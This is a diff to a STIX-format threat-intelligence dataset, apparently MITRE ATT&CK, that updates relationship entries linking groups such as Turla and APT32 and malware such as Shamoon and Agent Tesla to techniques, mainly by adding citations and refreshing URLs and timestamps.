"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -62036,14 +63059,19 @@
"source_name": "Secureworks BRONZE BUTLER Oct 2017"
},
{
- "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan",
+ "source_name": "Symantec Tick Apr 2016",
"description": "DiMaggio, J. (2016, April 28). Tick cyberespionage group zeros in on Japan. Retrieved July 16, 2018.",
- "source_name": "Symantec Tick Apr 2016"
+ "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
- "description": "(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Symantec Tick Apr 2016)",
+ "description": "(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)",
"type": "relationship",
- "modified": "2019-03-22T19:57:37.439Z",
+ "modified": "2020-06-24T01:27:31.917Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -62123,12 +63151,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3445-99"
}
],
- "source_ref": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32"
},
{
"id": "relationship--d7699bcf-5732-40f5-a715-d430b00b043e",
@@ -62507,22 +63535,27 @@
{
"id": "relationship--3c630128-27ba-4c71-b09a-c9ac39e7acac",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named \u201cntssrv\u201d that attempts to appear legitimate; the service's display name is \u201cMicrosoft Network Realtime Inspection Service\u201d and its description is \u201cHelps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.\u201d(Citation: Palo Alto Shamoon Nov 2016)",
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named \u201cntssrv\u201d that attempts to appear legitimate; the service's display name is \u201cMicrosoft Network Realtime Inspection Service\u201d and its description is \u201cHelps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.\u201d Newer versions create the \"MaintenaceSrv\" service, which misspells the word \"maintenance.\"(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Palo Alto Shamoon Nov 2016",
+ "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
"description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+ "source_name": "Palo Alto Shamoon Nov 2016"
+ },
+ {
+ "source_name": "McAfee Shamoon December 2018",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/",
+ "description": "Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020."
}
],
"source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"relationship_type": "uses",
"target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
"type": "relationship",
- "modified": "2020-03-18T15:49:09.611Z",
+ "modified": "2020-05-29T18:11:23.516Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -62638,22 +63671,27 @@
{
"id": "relationship--84e0c62b-b1a6-4ecd-8607-f0b516cb48f6",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) tries to add a scheduled task to establish persistence.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) tries to add a scheduled task to establish persistence.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
"type": "relationship",
- "modified": "2020-03-28T21:42:17.265Z",
+ "modified": "2020-06-16T20:51:13.735Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -62691,12 +63729,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
}
],
- "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1"
},
{
"id": "relationship--dcc2c503-25dc-47bb-b9cb-35ce27e73cd2",
@@ -62774,7 +63812,7 @@
{
"id": "relationship--93f1726f-f172-4705-a13a-d5adaeb4e91b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Oceanlotus May 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.(Citation: Volexity OceanLotus Nov 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -62783,18 +63821,13 @@
"source_name": "Volexity OceanLotus Nov 2017",
"description": "Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.",
"url": "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/"
- },
- {
- "source_name": "Cybereason Oceanlotus May 2017",
- "url": "https://www.cybereason.com/blog/operation-cobalt-kitty-apt",
- "description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018."
}
],
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2020-03-18T19:33:54.976Z",
+ "modified": "2020-06-19T20:04:12.448Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -62895,12 +63928,12 @@
"url": "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
}
],
- "source_ref": "malware--c2417bab-3189-4d4d-9d60-96de2cdaf0ab",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--c2417bab-3189-4d4d-9d60-96de2cdaf0ab",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32"
},
{
"id": "relationship--01b924d7-42dd-412f-a9af-cabcb46512ea",
@@ -63083,7 +64116,7 @@
{
"id": "relationship--e93c8f61-b2c9-4877-8c2c-12bd37aa5a87",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve screenshots from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)",
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve screenshots from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -63092,13 +64125,18 @@
"url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
"source_name": "FireEye MuddyWater Mar 2018"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
}
],
"source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
"relationship_type": "uses",
"target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
- "modified": "2019-04-22T22:36:52.990Z",
+ "modified": "2020-05-18T19:37:52.430Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -63188,7 +64226,7 @@
{
"id": "relationship--b8a1739d-240b-46c1-a25a-b82d1c4e4765",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover remote systems on a local network using the net view and net view /DOMAIN commands.(Citation: Kaspersky Turla)",
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover remote systems on a local network using the net view and net view /DOMAIN commands. [Turla](https://attack.mitre.org/groups/G0010) has also used net group \"Domain Computers\" /domain, net group \"Domain Controllers\" /domain, and net group \"Exchange Servers\" /domain to enumerate domain computers, including the organization's DC and Exchange Server.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -63197,13 +64235,18 @@
"url": "https://securelist.com/the-epic-turla-operation/65545/",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.",
"source_name": "Kaspersky Turla"
+ },
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
}
],
"source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
"relationship_type": "uses",
"target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
"type": "relationship",
- "modified": "2019-07-14T21:04:44.998Z",
+ "modified": "2020-06-29T02:52:31.794Z",
"created": "2017-05-31T21:33:27.045Z"
},
{
@@ -63241,12 +64284,12 @@
"url": "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
}
],
- "source_ref": "malware--b1de6916-7a22-4460-8d26-6b5483ffaa2a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--b1de6916-7a22-4460-8d26-6b5483ffaa2a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279"
},
{
"id": "relationship--fce7fac2-91da-4903-95dc-fb54650c0859",
@@ -63278,16 +64321,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.016Z",
+ "modified": "2020-05-14T15:14:33.559Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -63326,7 +64368,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7",
"type": "relationship",
- "modified": "2020-03-27T18:01:17.878Z",
+ "modified": "2020-06-20T20:42:37.432Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -63561,7 +64603,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -63569,7 +64611,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
- "modified": "2020-03-17T02:15:40.338Z",
+ "modified": "2020-06-22T17:54:15.513Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -63761,22 +64803,27 @@
{
"id": "relationship--5206976b-ac4d-4286-a954-4b1ef5c20adc",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) obtains the target's IP address and local network segment.(Citation: Palo Alto Shamoon Nov 2016)",
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) obtains the target's IP address and local network segment.(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Palo Alto Shamoon Nov 2016",
+ "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
"description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+ "source_name": "Palo Alto Shamoon Nov 2016"
+ },
+ {
+ "source_name": "McAfee Shamoon December 2018",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/",
+ "description": "Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020."
}
],
"source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"relationship_type": "uses",
"target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
- "modified": "2019-04-24T23:59:16.230Z",
+ "modified": "2020-05-29T18:11:23.866Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -63803,7 +64850,7 @@
{
"id": "relationship--9eefeafd-aca1-4e4c-8d29-ea6f9154808a",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover network configuration details using the arp -a, nbtstat -n, nbtscan, and net config commands.(Citation: Kaspersky Turla)(Citation: Symantec Waterbug Jun 2019) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also retrieved registered RPC interface information from process memory.(Citation: ESET Turla PowerShell May 2019)",
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover network configuration details using the arp -a, nbtstat -n, nbtscan, net config, ipconfig /all, and route commands.(Citation: Kaspersky Turla)(Citation: Symantec Waterbug Jun 2019)(Citation: ESET ComRAT May 2020) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also retrieved registered RPC interface information from process memory.(Citation: ESET Turla PowerShell May 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -63819,16 +64866,21 @@
"description": "Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019."
},
{
- "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.",
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "ESET Turla PowerShell May 2019",
"url": "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/",
- "source_name": "ESET Turla PowerShell May 2019"
+ "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019."
}
],
"source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
"relationship_type": "uses",
"target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
- "modified": "2019-07-14T21:04:44.984Z",
+ "modified": "2020-06-29T02:52:31.826Z",
"created": "2017-05-31T21:33:27.044Z"
},
{
@@ -64125,12 +65177,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5"
},
{
"id": "relationship--10c6cc56-a028-4c2a-b24e-38d97fb4ebb7",
@@ -64248,14 +65300,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
"type": "relationship",
- "modified": "2020-03-16T17:37:15.714Z",
+ "modified": "2020-06-29T01:54:53.342Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -64602,16 +65654,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.101Z",
+ "modified": "2020-05-14T14:30:09.437Z",
"created": "2017-05-31T21:33:27.055Z"
},
{
@@ -64665,16 +65716,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.644Z",
+ "modified": "2020-04-21T23:09:31.036Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -64754,7 +65805,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -64762,7 +65813,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2020-03-17T02:15:40.342Z",
+ "modified": "2020-06-22T17:54:15.486Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -64825,12 +65876,12 @@
"url": "https://pentestlab.blog/2017/04/19/stored-credentials/"
}
],
- "source_ref": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580"
},
{
"id": "relationship--252c0e02-0da6-4812-b147-81d9cfb3c998",
@@ -65052,14 +66103,14 @@
"target_ref": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f",
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
],
"description": "(Citation: McAfee Honeybee)",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.342Z",
+ "modified": "2020-04-16T19:41:40.645Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -65343,22 +66394,27 @@
{
"id": "relationship--0024d82d-97ea-4dc5-81a1-8738862e1f3b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) obtains the system time and will only activate if it is greater than a preset date.(Citation: Palo Alto Shamoon Nov 2016)",
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) obtains the system time and will only activate if it is greater than a preset date.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Palo Alto Shamoon Nov 2016",
+ "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
"description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+ "source_name": "Palo Alto Shamoon Nov 2016"
+ },
+ {
+ "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.",
+ "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "source_name": "Unit 42 Shamoon3 2018"
}
],
"source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"relationship_type": "uses",
"target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
"type": "relationship",
- "modified": "2019-04-24T23:59:16.298Z",
+ "modified": "2020-05-29T18:11:24.446Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -65558,12 +66614,12 @@
"url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
}
],
- "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18"
},
{
"id": "relationship--b41c9b77-536b-49bc-8cb9-a873aa121002",
@@ -65665,14 +66721,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5",
"type": "relationship",
- "modified": "2020-03-23T16:14:53.746Z",
+ "modified": "2020-06-29T01:54:53.350Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -66075,18 +67131,23 @@
],
"external_references": [
{
- "source_name": "Fortinet Agent Tesla April 2018",
+ "description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.",
"url": "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
- "description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018."
+ "source_name": "Fortinet Agent Tesla April 2018"
+ },
+ {
+ "source_name": "Malwarebytes Agent Tesla April 2020",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "description": "Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) obfuscates its code in an apparent attempt to make analysis difficult.(Citation: Fortinet Agent Tesla April 2018)",
